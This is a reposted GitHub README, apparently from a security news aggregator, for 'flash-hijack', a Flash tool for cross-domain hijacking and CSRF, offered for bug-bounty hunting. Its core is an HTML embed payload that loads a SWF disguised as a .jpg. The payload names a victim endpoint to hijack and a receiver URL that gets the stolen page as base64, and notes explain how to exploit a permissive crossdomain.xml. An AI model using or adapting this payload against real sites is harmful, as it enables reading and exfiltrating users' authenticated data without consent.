GitHub - 7dog7/flash-hijack: flash 劫持轮子,CSRF,劫持,跳转,swf 有需求可以提issues ,src挖掘
2019-08-09 15:51:40 Author: github.com(查看原文) 阅读量:165 收藏

Join GitHub today

GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

Sign up

flash 劫持轮子

使用: HTML:

<div> <embed src="http://www.baidu.com/hijack.jpg?jpg=http://127.0.0.1/1.png&get=http://127.0.0.1/l.php&post=http://127.0.0.1/2.php" width="970" height="107" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent"></embed> </object> </div>

参数说明:

jpg:域下的图片(为了优先加载crossdomain.xml,否则劫持的接口加载太慢会导致无法劫持)

get:劫持的接口或者页面

post:接收劫持过来的页面为base64传输

文章:https://zhuanlan.zhihu.com/p/67484852


文章来源: https://github.com/7dog7/flash-hijack
如有侵权请联系:admin#unsafe.sh